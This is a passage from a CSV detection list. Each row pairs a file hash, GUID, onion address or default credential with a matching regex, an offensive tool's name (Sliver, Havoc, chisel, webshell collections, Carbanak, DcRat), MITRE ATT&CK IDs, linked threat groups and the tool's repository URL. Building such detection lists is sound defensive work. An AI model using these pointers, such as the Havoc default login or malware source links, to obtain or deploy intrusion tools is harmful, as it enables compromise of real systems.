"*5fa4acad2bf202e61149a7f47189c4d60ac2823ea26d0f449912ab9d28ad0806*",".{0,1000}5fa4acad2bf202e61149a7f47189c4d60ac2823ea26d0f449912ab9d28ad0806.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","27650" "*5fa4acad2bf202e61149a7f47189c4d60ac2823ea26d0f449912ab9d28ad0806*",".{0,1000}5fa4acad2bf202e61149a7f47189c4d60ac2823ea26d0f449912ab9d28ad0806.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","27651" "*5faa6197612a38b41bb54cbec6c782b5ea1bfb2da9ce236e493451de1b33ff47*",".{0,1000}5faa6197612a38b41bb54cbec6c782b5ea1bfb2da9ce236e493451de1b33ff47.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - 
T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27653" "*5FAC3991-D4FD-4227-B73D-BEE34EB89987*",".{0,1000}5FAC3991\-D4FD\-4227\-B73D\-BEE34EB89987.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","#GUIDproject","N/A","10","2","155","29","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z","27654" "*5FAE766D503C33AD0AE90520BFA0ADA54FFC6FF998B0542D1CF63D94B4126E3F*",".{0,1000}5FAE766D503C33AD0AE90520BFA0ADA54FFC6FF998B0542D1CF63D94B4126E3F.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","#filehash","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","27655" "*5FB1809B-B0FD-48E9-9E47-3CB048369433*",".{0,1000}5FB1809B\-B0FD\-48E9\-9E47\-3CB048369433.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","27657" "*5fb9e4e174759ac8d6d8fb6ac151bbe0d7564759d508c246c8c9b5eb4b28c8d7*",".{0,1000}5fb9e4e174759ac8d6d8fb6ac151bbe0d7564759d508c246c8c9b5eb4b28c8d7.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning 
and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","27658" "*5fb9f7c101e98f3fd5c011f47519f007fe5d19decf1ade2d36ed57f378b29042*",".{0,1000}5fb9f7c101e98f3fd5c011f47519f007fe5d19decf1ade2d36ed57f378b29042.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27659" "*5fbee690299d3b057447b595c46845c34a1fe90a1e616fbb07bb5e0d019bc101*",".{0,1000}5fbee690299d3b057447b595c46845c34a1fe90a1e616fbb07bb5e0d019bc101.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27661" "*5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619*",".{0,1000}5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - 
T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","27663" "*5fd40c34131b8d6ea75e04630018ca96f144074e3d471d82c1226fe7356ef194*",".{0,1000}5fd40c34131b8d6ea75e04630018ca96f144074e3d471d82c1226fe7356ef194.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27665" "*5fd654e8009f29c4f0137c797678d68065bb7a987a70a4437c99623de13d43f7*",".{0,1000}5fd654e8009f29c4f0137c797678d68065bb7a987a70a4437c99623de13d43f7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27666" "*5fdc26ee180c18e799e436da359f24c54ebeb91cbb5206b89f3c82b0d28b93b5*",".{0,1000}5fdc26ee180c18e799e436da359f24c54ebeb91cbb5206b89f3c82b0d28b93b5.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27668" "*5fdf6b4174877ef37a8f8dbb43fb9c1791e8c26da11ec86b6050c64ace740608*",".{0,1000}5fdf6b4174877ef37a8f8dbb43fb9c1791e8c26da11ec86b6050c64ace740608.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","27669" "*5fe51276c79ff276e21dfdbf4d8e44cdc13a4d606668a8b89c0fdf7f42e37428*",".{0,1000}5fe51276c79ff276e21dfdbf4d8e44cdc13a4d606668a8b89c0fdf7f42e37428.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27670" "*5FEB114B-49EC-4652-B29E-8CB5E752EC3E*",".{0,1000}5FEB114B\-49EC\-4652\-B29E\-8CB5E752EC3E.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#GUIDproject","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","27671" "*5FEB114B-49EC-4652-B29E-8CB5E752EC3E*",".{0,1000}5FEB114B\-49EC\-4652\-B29E\-8CB5E752EC3E.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - 
T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","0","#GUIDproject","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","27672" "*5feea3420bc6019eda4db16b0c89d205ad258d54313782f236aacbf073bd33fa*",".{0,1000}5feea3420bc6019eda4db16b0c89d205ad258d54313782f236aacbf073bd33fa.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27675" "*5ff378d7374d099fefedb432a31052230322119401518b244a8b7b66415bc988*",".{0,1000}5ff378d7374d099fefedb432a31052230322119401518b244a8b7b66415bc988.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27676" "*5ff6041ece711cce493b1f305eda3b9b619fee0df9061d6e324de131e7b2732b*",".{0,1000}5ff6041ece711cce493b1f305eda3b9b619fee0df9061d6e324de131e7b2732b.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27677" "*5ff663f155004fde14399555c5327e3a67f277574c115cea507ee2998746bd2d*",".{0,1000}5ff663f155004fde14399555c5327e3a67f277574c115cea507ee2998746bd2d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - 
Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27678" "*5ff9448bdad5a868174073bd76b1cbc27b434d1e54cb931d22258dd34ff6a7de*",".{0,1000}5ff9448bdad5a868174073bd76b1cbc27b434d1e54cb931d22258dd34ff6a7de.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27680" "*5ffd03dd56f6f41ea426cca9bec8df3eee40a670204aca73a1d8a6dc076a3011*",".{0,1000}5ffd03dd56f6f41ea426cca9bec8df3eee40a670204aca73a1d8a6dc076a3011.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27681" "*5ffd93d97e56861c46c562585d50dc820200763e633052b6a6d1e53566822cf8*",".{0,1000}5ffd93d97e56861c46c562585d50dc820200763e633052b6a6d1e53566822cf8.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27682" "*5fffcdd337374e2843c7582b798b983785da5ab3afb6e30b78cef4620d248b09*",".{0,1000}5fffcdd337374e2843c7582b798b983785da5ab3afb6e30b78cef4620d248b09.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary 
emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27683" "*5ntlvn7lmkezscee2vhatjaigkcu2rzj3bwhqaz32snmqc4jha3gcjad.onion*",".{0,1000}5ntlvn7lmkezscee2vhatjaigkcu2rzj3bwhqaz32snmqc4jha3gcjad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","27684" "*5slcifus86ojqs51ubctih0p35izi3x6ynyo2q2pnqs7syvnqa*",".{0,1000}5slcifus86ojqs51ubctih0p35izi3x6ynyo2q2pnqs7syvnqa.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#certificate","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27685" "*5spider:password1234*",".{0,1000}5spider\:password1234.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","27686" 
"*60015ca2e810e1e04f6e7eb58ea019bcf0629a0f3e7ab370a7d9f7ad7bdf0420*",".{0,1000}60015ca2e810e1e04f6e7eb58ea019bcf0629a0f3e7ab370a7d9f7ad7bdf0420.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27687" "*6003ae86c0abcc19ae6c799724e679762ed37934ab6b5c3064f65988df64a242*",".{0,1000}6003ae86c0abcc19ae6c799724e679762ed37934ab6b5c3064f65988df64a242.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#filehash","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","27688" "*60049ba3c5bb513e7ab79467f76fd71f2c38a697bcca3ef1949dd31720420555*",".{0,1000}60049ba3c5bb513e7ab79467f76fd71f2c38a697bcca3ef1949dd31720420555.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27689" "*6009ef1efbb6273b711b329e0a9a7697b2eba2b0538d1a2b1fa160ef30e8d5a8*",".{0,1000}6009ef1efbb6273b711b329e0a9a7697b2eba2b0538d1a2b1fa160ef30e8d5a8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27690" "*600a76fba6033e9f4a42fb3154c2f0fdc7decfc3794cb37efc2f4847739b4a4a*",".{0,1000}600a76fba6033e9f4a42fb3154c2f0fdc7decfc3794cb37efc2f4847739b4a4a.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","27691" "*600f564845d4257540556c7dd75333ad0a206c3ce9e88048db23c0ff5396f3f0*",".{0,1000}600f564845d4257540556c7dd75333ad0a206c3ce9e88048db23c0ff5396f3f0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27692" "*601cbe74d7aed23f52bae7d326f08b86665c167b3d14fedfa545efb5a6e56d83*",".{0,1000}601cbe74d7aed23f52bae7d326f08b86665c167b3d14fedfa545efb5a6e56d83.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","27693" 
"*602ca6be5b05c2a3d9ed9e038ce1fb3d030cc09cc5038ce751d0eeb3041f1f6a*",".{0,1000}602ca6be5b05c2a3d9ed9e038ce1fb3d030cc09cc5038ce751d0eeb3041f1f6a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27695" "*602d67f4b63650f0e935953440895184e8edf2b4eab7bfdcf134bc02714156e0*",".{0,1000}602d67f4b63650f0e935953440895184e8edf2b4eab7bfdcf134bc02714156e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27696" "*602e1ec82a4e6904a567a7e4c979b83a38fd5d734dd3d614d947365d40d5d579*",".{0,1000}602e1ec82a4e6904a567a7e4c979b83a38fd5d734dd3d614d947365d40d5d579.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27697" "*603db5a0982f09dcdff3ec26a28371bc5bdd6c867e344a52e3fef572769fb5b1*",".{0,1000}603db5a0982f09dcdff3ec26a28371bc5bdd6c867e344a52e3fef572769fb5b1.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27699" "*604f76c6478fa080af7052988d643c407a6851d5b4ed0a30858a54d6bf010445*",".{0,1000}604f76c6478fa080af7052988d643c407a6851d5b4ed0a30858a54d6bf010445.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","27700" "*60505a1d3406e698abd0d1019aff73029d23af426a60672d85780d0f6517fccf*",".{0,1000}60505a1d3406e698abd0d1019aff73029d23af426a60672d85780d0f6517fccf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27701" "*605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4*",".{0,1000}605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 
- TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27702" "*60586b8ebffb86b765ee2086189fa6e0e9e4346d1443e5c133fd5ae4e6b13277*",".{0,1000}60586b8ebffb86b765ee2086189fa6e0e9e4346d1443e5c133fd5ae4e6b13277.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27703" "*605e19b1230344fa63de6979e952594fa3505e47c91b5022ea0334971e6fe812*",".{0,1000}605e19b1230344fa63de6979e952594fa3505e47c91b5022ea0334971e6fe812.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27704" "*605fba81b3a049064b1bff90a6ffba00cbde7e68cdb5c22cbaa197251fc0b081*",".{0,1000}605fba81b3a049064b1bff90a6ffba00cbde7e68cdb5c22cbaa197251fc0b081.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","27705" 
"*606da919a03a92204bcd8653dfad8ebd79bc1a05b4760ce92c0d85eb2dc0439d*",".{0,1000}606da919a03a92204bcd8653dfad8ebd79bc1a05b4760ce92c0d85eb2dc0439d.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","27706" "*60724a25dd319ec57b77e16c52e52a09c7b82ed4ea38dab6d6c2e880dcebb439*",".{0,1000}60724a25dd319ec57b77e16c52e52a09c7b82ed4ea38dab6d6c2e880dcebb439.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. 
as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27707" "*6089b1431d6107150c713a5d83c664be739b2b2f179fab3fa51d1280c4124adc*",".{0,1000}6089b1431d6107150c713a5d83c664be739b2b2f179fab3fa51d1280c4124adc.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27709" "*608dc4ee1e7301aaa26bf7b95aa83ff1b5464f366deb206c4c148434e1970ccb*",".{0,1000}608dc4ee1e7301aaa26bf7b95aa83ff1b5464f366deb206c4c148434e1970ccb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation 